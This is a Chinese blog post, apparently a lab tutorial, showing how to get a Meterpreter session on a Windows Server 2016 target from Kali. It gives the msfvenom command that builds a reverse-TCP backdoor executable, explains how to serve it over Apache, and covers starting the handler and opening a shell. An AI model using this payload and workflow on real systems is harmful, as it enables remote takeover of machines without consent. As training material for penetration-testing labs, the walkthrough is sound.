metasploit上线windows2016靶机

最新推荐文章于 2024-04-20 23:19:41 发布
最新推荐文章于 2024-04-20 23:19:41 发布
阅读量647 收藏 3
点赞数 2
分类专栏: Metasploit 文章标签: metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53030229/article/details/124831607
版权

文章目录

攻击机:kali
靶机:windows2016

一、生成后门

由于这个后门没有经过免杀,所以需要你们把windows2016防火墙关闭,你们·可以·自己去学习一下免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.1(自己kali的IP) lport=50000 -f exe>test.exe

在这里插入图片描述

二、windows2016靶机下载后门

1、首先,我们需要开启apache2,然后将后门放入/var/www/html目录下

在这里插入图片描述

2、windows2016下载后门程序

在网页输入自己IP加后门名字浏览器打开就行

http://192.168.0.1/test.exe

在这里插入图片描述

三、设置监听

先在kali设置监听,然后运行后门程序

1、开启metasploit

先输入sudo msfconsole然后输入kali密码
在这里插入图片描述

2、设置监听模块

LHOST和LPORT填生成后门的IP地址和端口,然后在设置一下连接方式
在这里插入图片描述
在这里插入图片描述

四、上线windows2016靶机

1、先点击run,然后在运行windows2016靶机的后门程序

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这就上线windows2016靶机成功了,然后使用shell命令进入windows2016控制台,由于两个系统有区别会出现乱码,我们使用chcp 65001解决。

注:由于本人表达能力不怎么样,如有冒犯或错误,请及时告知,谢谢!
ter_ret
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
metasploitWindows的多种提权方法
02-25
Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限。环境要求:1.攻击机:kalilinux2.目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提...
metasploit Windows版下载
08-13
适用渗透人员
Metasploit Pro 4.22.2-2023073101 (Linux, Windows) - 渗透测试框架
sysin | SYStem INside
08-04 192
Metasploit Pro 4.22.2-2023073101 (Linux, Windows) - 渗透测试框架
MS08-067靶机下载
边城浪子的博客
09-08 1649
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
windows服务器配合PhpStudy搭建公网DVWA靶机
最新发布
idjjya的博客
04-20 996
考虑到新手小白使用windows服务器居多,特出此教程(64位)搭建靶机所需设备及工具:1、windows服务器(自备)2、phpstudy3、DVWA靶机包4、Notepad++ (一款超强的文档编辑器)密码:1y9b开始搭建……
Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机
monster663的博客
02-06 4669
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《中华人民共和国网络安全法》,共同维护清朗的网络空间 一、Metasploit(MSF)简介 Metasploit与2003年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。 Metasploit主要包含以下几个模块: 1.辅助模块(Aux
Windows靶机永恒之蓝MS17-010漏洞复现
Stubborn_Lanmail的博客
05-13 2131
实验目标 扫描windows靶机漏洞,并使用MSF框架利用漏洞攻击靶机,最后成功获得靶机的控制权 实验环境 攻击机:kali 2020.3 (IP地址:192.168.146.147) 靶机metasploitable3-win2k8r2(win2008,IP地址:192.168.146.145) 实验步骤 一、利用Nessus工具扫描靶机漏洞 在kali上安装Nessus 从官网上直接下载安装包安装即可(注意版本) Nessus官网地址:https://www.tenable.com 点击右上角“Ne
kali攻击blue(win7)靶机
weixin_50339832的博客
12-28 4196
目录1.找到目标靶机2.进行漏洞探测,识别服务3.漏洞识别与发现1)探测永恒之蓝漏洞2)进行漏洞利用,获取权限3)在目标靶机写入一个文件 配置blue IP地址(需要和kali处于同一网段,但最后一位不相同) KALI的主机IP地址为:192.168.179.128(用root) 在KALI中ping通blue的地址,出现time即成功 1.找到目标靶机 nmap -p 445 192.168.179.0/24 Nmap scan report for 192.168.179.1 Host is up (
Metasploit简单利用及入侵Windows7案例.docx
11-13
Metasploit 入门---漏洞利用实验,攻击机系统:kali linux虚拟机。本文选择MS17_010漏洞(永恒之蓝)和MS08-067漏洞利用来尝试入侵Windows7虚拟机系统,目标机系统:Windows7 x64虚拟机。
使用Metasploit入侵windows之自动扫描
08-07
Metasploit入侵windows之自动扫描方法
Vulnhub靶机:DOMDOM_ 1
LainWith的博客
02-04 1067
目录介绍信息收集主机发现主机信息探测测试网站命令执行-反弹shell脏牛提权方式1方式2其他提权方式参考 介绍 系列:DomDom(此系列仅此一台) 发布日期:2019年7月11日 难度:初级 Flag : 未知 学习: 靶机地址:https://www.vulnhub.com/entry/domdom-1,328/ 信息收集 主机发现 nmap -sn 192.168.40.0/24 主机信息探测 信息探测:nmap -A -p- 192.168.40.152,只开放了80等端口。 测试网站 打开网
OWASP1.2靶机百度云下载地址.txt
05-16
OWASP 1.2靶机百度云下载
看完这篇 教你玩转渗透测试靶机vulnhub——hackableII
Aluxian_的博客
10-07 1278
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。这个靶机很简单就一个提权是新知识点 别的信息收集,FTP匿名,回弹shell md5解码都是之前做过的!
DC-5靶机渗透笔记(有靶机下载链接)
qq_45900622的博客
05-29 1746
DC-5靶机下载地址:下载链接 主机发现 a.查看本kali(攻击机)ip地址 ifconfigb.扫面本攻击机本网段发现靶机 nmap -sP 192.168.6.0/24 靶机ip为192.168.6.134 扫描靶机端口确认服务 nmap -A 192.168.6.134 发现靶机开放80端口,nginx 打开浏览器访问一下瞅瞅 访问192.168.6.134 浏览一下发现就contact有个提交界面 随便提交一下 刷新一下发现页脚码的时间多次变化 … 没啥头绪,用dirbuster扫面一下靶机
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
wwwwyyyrre的博客
04-22 2406
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。
Metasploit内网安全渗透win7
m0_65364832的博客
01-16 1535
在Kali Linux中使用Metasploit通过ms17_010(永恒之蓝)对同一局域网下的主机的445端口和139端口进行内网渗透测试。通过实践操作,了解渗透测试基本过程。
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 1962
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
HTB靶场系列 Windows靶机 Legacy靶机
程序员阿飘 的博客
01-10 380
本文已参与「新人创作礼」活动,一起开启掘金创作之路。
vulnhub靶机DC4
weixin_52450702的博客
11-02 608
dc-4靶机ip:192.168.70.163靶机下载地址:https://download.vulnhub.com/dc/DC-4.zip.torrent。
metasploit渗透windows xp
09-19
在渗透测试中使用Metasploit来攻击Windows XP系统,需要进行以下步骤: 1. 首先,在本机上下载并安装Windows版本的Metasploit-framework,并在命令行中输入"msfconsole"命令来运行Metasploit。 2. 在虚拟机软件(如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值